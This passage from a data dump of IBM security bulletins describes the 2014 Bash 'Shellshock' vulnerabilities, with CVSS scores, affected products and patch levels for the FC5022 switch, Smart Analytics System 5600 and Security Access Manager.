allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVE-ID:** [CVE-2014-6277](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>)\n\n**Description:** GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service.\n\nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVE-ID:** [CVE-2014-6278](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>)\n\n**Description:** GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service.\n\nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected products and versions\n\nIBM Flex System FC5022 16Gb Fibre Channel SAN Switch is vulnerable if running any version of Fabric Operating System (FOS) lower than those listed in the Remediation/Fixes section below.\n\n## Remediation/Fixes:\n\nIt is recommended that you upgrade to the following levels of FOS for each of the following products to obtain the fix for the vulnerability: Switch Product Version | Fixes \n---|--- \nFC5022 16Gb Fibre Channel SAN Switch for Flex 1.3.2 | Move to 7.2.1c1 \nFC5022 16Gb Fibre Channel SAN Switch for Flex 1.3.1.2 | Move to 7.2.0d6 \nFC5022 16Gb Fibre Channel SAN Switch for Flex 1.3.0.2 | Move to 7.0.0_pha6 \n \n## Workaround(s) & Mitigation(s):\n\nNone\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n[Subscribe to Security Bulletins](<http://www.ibm.com/support/mynotifications/>) \n\n\n**Acknowledgement**\n\nNone\n\n**Change History** \n08 December 2014: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOn \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n## Operating System\n\nPureFlex System and Flex System:Operating system independent / None\n\n[{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Product\":{\"code\":\"HW94A\",\"label\":\"Flex System Manager Node\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Product\":{\"code\":\"HW94F\",\"label\":\"Enterprise Chassis\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-31T01:35:01", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Flex System FC5022 16Gb Fibre Channel SAN Switch (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-01-31T01:35:01", "id": "66E2077EC744F0C58908B64187C65DB343B9899133C02D3D2AD75F82D3A5771A", "href": "https://www.ibm.com/support/pages/node/865684", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:12:44", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by the IBM Smart Analytics System 5600.\n\n## Vulnerability Details\n\n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Smart Analytics System 5600\n\n## Remediation/Fixes\n\nFor each affected component in the table, download the recommended fix, and install using the link in the **Installation instructions** column. \n \nFor more information about IBM IDs, see the [Help and FAQ](<https://www.ibm.com/account/profile/us?page=faqhelp>). \n \n\n\n**IBM Smart Analytics System 5600 V1 and V2** \n--- \n**Affected Component**| **Recommended Fix**| **Download Link**| **Installation instructions** \nSUSE Linux Enterprise Server 11| Update Bash to 3.1-24.34.1| [Novell: Patch 9781](<http://download.novell.com/Download?buildid=5DWQOT2vyus~>)| [Installing a SUSE Linux Enterprise Server update in a Balanced Warehouse or IBM Smart Analytics System or Balanced Warehouse environment ](<http://www.ibm.com/support/docview.wss?uid=swg21685899>) \nIBM System Storage SAN24B (Brocade)| Upgrade to 7.2.1c1| [Brocade: FOS 7.2.1c1](<ftp://testcase.software.ibm.com/fromibm/hw/brocade_fos_7.2.1c1/>)| [Installing an IBM System Storage SAN switch firmware update in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www.ibm.com/support/docview.wss?uid=swg21686554>) \n**IBM Smart Analytics System 5600 V3** \nSUSE Linux Enterprise Server 11| Contact IBM Support \nIBM System Storage SAN24B (Brocade)| Upgrade to 7.2.1c1| [Brocade: FOS 7.2.1c1](<ftp://testcase.software.ibm.com/fromibm/hw/brocade_fos_7.2.1c1/>)| [Installing an IBM System Storage SAN switch firmware update in an IBM Smart Analytics System or IBM PureData System for Operational Analytics environment](<http://www.ibm.com/support/docview.wss?uid=swg21686554>) \n \n**Contact IBM Support:** \nIn the United States and Canada dial **1-800-IBM-SERV** \nView the support [contacts for other countries](<http://www.ibm.com/planetwide/>) outside of the United States. \nElectronically [open a Service Request](<http://www.ibm.com/software/data/db2/support/db2_9/probsub.html>) with IBM Support. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nOctober 10, 2014: Original version published.\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSKT3D\",\"label\":\"IBM Smart Analytics System\"},\"Business Unit\":{\"code\":\"BU050\",\"label\":\"BU NOT IDENTIFIED\"},\"Component\":\"IBM Smart Analytics System 5600\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.7;10.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:58:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-16T13:58:11", "id": "1525B7B67DA5402BE989F9E37182D44E4D8FAE3BB181A2DBEA5C3A5BAB647E3B", "href": "https://www.ibm.com/support/pages/node/253093", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:01:40", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Security Access Manager for Mobile and IBM Security Access Manager for Web.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Security Access Manager for Mobile 8.0, firmware versions 8.0.0.0, 8.0.0.1, 8.0.0.3, 8.0.0.4, and 8.0.0.5 \n \nIBM Security Access Manager for Web 7.0 and 8.0, firmware versions 7.0, 7.0.0.1, 7.0.0.2, 7.0.0.3, 7.0.0.4, 7.0.0.5, 7.0.0.6, 7.0.0.7, 7.0.0.8, 7.0.0.9, 8.0.0.2, 8.0.0.3, 8.0.0.4, and 8.0.0.5\n\n## Remediation/Fixes\n\nIBM has provided patches for all affected versions. Follow the installation instructions in the README files included with the patch. \n \n \n\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_IBM Security Access Manager for Mobile - __8.0_| _8.0.0.0 \n8.0.0.1 \n8.0.0.3 \n8.0.0.4_ \n_8.0.0.5_| IV65366| [8.0.0.5-ISS-ISAM-IF0001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Security+Access+Manager+for+Mobile&release=8.0&platform=All&function=all>) \n_IBM Security Access Manager for Web -_ _8.0_| _8.0.0.2 \n8.0.0.3 \n8.0.0.4_ \n_8.0.0.5_| IV65372| [8.0.0.5-ISS-WGA-IF0001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=8.0&platform=All&function=all>) \n_IBM Security Access Manager for Web -_ _7.0_| _7.0.0.0 \n7.0.0.1 \n7.0.0.2 \n7.0.0.3_ \n_7.0.0.4 \n7.0.0.5 \n7.0.0.6 \n7.0.0.7_ \n_7.0.0.8_ \n_7.0.0.9_| IV65367| [7.0.0.9-ISS-WGA-IF0001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=7.0.0&platform=All&function=all>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n1 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSELE6\",\"label\":\"IBM Security Access Manager for Mobile\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.0;8.0.0.1;8.0.0.2;8.0.0.3;8.0.0.4;8.0.0.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}},{\"Product\":{\"code\":\"SSPREK\",\"label\":\"Tivoli Access Manager for e-business\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:19:53", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Security Access Manager for Mobile and IBM Security Access Manager for Web (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-16T21:19:53", "id": "92653814B5AD58699CB141C05798FBA49CD5D97ED94F23B96F6DFAA714EA627D", "href": "https://www.ibm.com/support/pages/node/252257", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T12:39:39", "description": "## Summary\n\nSix Bash vulnerabilities were 